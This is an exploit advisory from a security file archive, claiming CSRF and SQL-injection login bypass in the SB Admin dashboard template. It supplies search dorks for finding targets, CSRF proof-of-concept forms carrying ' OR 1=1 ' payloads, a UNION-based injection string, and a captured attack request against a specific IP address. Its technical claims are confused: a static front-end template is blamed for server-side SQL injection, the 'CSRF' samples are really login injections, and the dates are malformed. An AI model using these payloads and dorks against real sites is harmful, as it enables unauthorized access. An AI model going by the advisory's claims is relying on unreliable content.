what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SB Admin Cross Site Request Forgery / SQL Injection

SB Admin Cross Site Request Forgery / SQL Injection
Posted Jan 17, 2022
Authored by Taurus Omar

SB Admin suffers from cross site request forgery and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection, csrf
SHA-256 | bc481b1b6ef15e1c81979f3faa7fd5e035acbdc0fedd25844262c33dc6b8c43d

SB Admin Cross Site Request Forgery / SQL Injection

Change Mirror Download
$$$$$$$\                                                 
$$ __$$\
$$ | $$ |$$\ $$\ $$\ $$$$$$$\ $$$$$$\ $$$$$$$\
$$$$$$$ |$$ | $$ | $$ |$$ __$$\ $$ __$$\ $$ _____|
$$ ____/ $$ | $$ | $$ |$$ | $$ | $$$$$$$$ |$$ /
$$ | $$ | $$ | $$ |$$ | $$ | $$ ____|$$ |
$$ | \$$$$$\$$$$ |$$ | $$ |$$\\$$$$$$$\ \$$$$$$$\
\__| \_____\____/ \__| \__|\__|\_______| \_______|
Offensive Security Community [Ecuador]


Credits & Authors:
==================
Taurus Omar - @TaurusOmar_ (whoami@taurusomar) [taurusomar.com]

Document Title:
===============
SB Admin Bootstrap CSRF / Sqli Vulnerability / Bypasss Login Access


Severity Level:
===============
High

Google & Bing Dorks
===================
intitle:SB Admin - login
intitle:SB Admin 2 - login

Affect
===================
Araound: 1 Millions of sites

Vulnerability Reported Timeline:
==================================
2021-31-07: Reported

Vulnerability Disclosure Timeline:
==================================
2022-15-01: Public Disclosure

Discovery Status:
=================
Published

Affected Product(s):
====================
SB Admin
SB Admin 2

Product & Service Introduction:
===============================
SB Admin, a well-known dashboard template recently migrated to Bootstrap 5.
This iconic product comes with minimal custom styling using Google's material
design patterns and pre-build pages like a dashboard, charts, data tables,
and authentication pages, styles along with a variety of plugins to create a
powerful framework for creating admin panels, web apps, or dashboard UI's for
your next project. The product uses PUG templates, SCSS and JS scripts for
compilation and production build (no Gulp or heavier Webpack).

Abstract Advisory Information:
==============================
An independent researcher discovered Multiple Vulnerabilities in the official aplication SB Admin

CSRF Technical Details & Description:
=====================================
A client-side cross site request forgery vulnerability has been discovered in the official SB Admin control web-application.
The vulnerability allows to execute unauthorized client-side application functions without secure validation or session token protection mechanism.
The security risk of the cross site request forgery vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5.
Exploitation of the vulnerability dont requires web-application user account and low user interaction. Successful exploitation of the vulnerability results in unauthorized add or add of SB Admin connect service panel staff.The web vulnerability can be exploited by any attackers.

Proof video:
============
https://imgur.com/A6KuhcW

Proof of Concept CSRF (PoC-1):
==============================
<html>
<body>
<form action="https://site.com/panel/index.html" method="POST">
<div class="form-group">
<input type="hidden" class="form-control form-control-user" aria-describedby="emailHelp" id="exampleInputEmail1" value="" OR 1 = 1 -- -"" required="">
</div>
<div class="form-group">
<input type="hidden" class="form-control form-control-user" id="exampleInputPassword" value="" OR 1 = 1 -- -"" required="">
</div>
<div class="form-group">
</div>
</div>
<button type="submit" class="btn btn-primary btn-user btn-block">
Login
</button>
</form>

Proof of Concept CSRF (PoC-2):
==============================
<html>
<body>
<form action="https://site.com/panel/index.php" method="POST">
<div class="form-group">
<input type="hidden" class="form-control form-control-user" aria-describedby="emailHelp" id="exampleInputEmail1" value="" OR 1 = 1 -- -"" required="">
</div>
<div class="form-group">
<input type="hidden" class="form-control form-control-user" id="exampleInputPassword" value="" OR 1 = 1 -- -"" required="">
</div>
<div class="form-group">
</div>
</div>
<button type="submit" class="btn btn-primary btn-user btn-block">
Login
</button>
</form>


Sqli Technical Details & Description:
=====================================
The SQL injection attack consists of insertion or “injection” of a SQL query via
the input-login data from the client to the application. The successful SQL injection
exploit can read sensitive data from the database, modify database data
(Insert/Update/Delete), execute administration operations on the database
(such as shutdown the DBMS), recover the content of a given file present on the DBMS file system.

Proof video:
============
https://imgur.com/0Z7vtj4

Payload:
========
usuario=§" OR 1 = 1 UNION ALL SELECT CONCAT(0x716b767671,0x677571554f657363504e4974794a7a4a6e43786b727a45514d5146766f6241706a73716e4c527651,0x7178627071),NULL-- - -- -"§&password=§" OR 1 = 1 -- -"§

BurpSuite
==========
POST /requisicao/login.php HTTP/1.1
Host: 186.251.225.174
Content-Length: 47
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://186.251.225.174
Referer: http://186.251.225.174/login.html
Accept-Encoding: gzip, deflate
Accept-Language: es-CO,es;q=0.9
Connection: close

usuario=" OR 1 = 1 -- -"&senha=" OR 1 = 1 -- -"

Inputs Vulnerabilities
======================
usuario=" OR 1 = 1 -- -"&senha=" OR 1 = 1 -- -"
email=" OR 1 = 1 -- -"&password=" OR 1 = 1 -- -"
username=" OR 1 = 1 -- -"&password=" OR 1 = 1 -- -"
user=" OR 1 = 1 -- -"&pass=" OR 1 = 1 -- -"


#######
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's
# responsibility.
#
#######
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close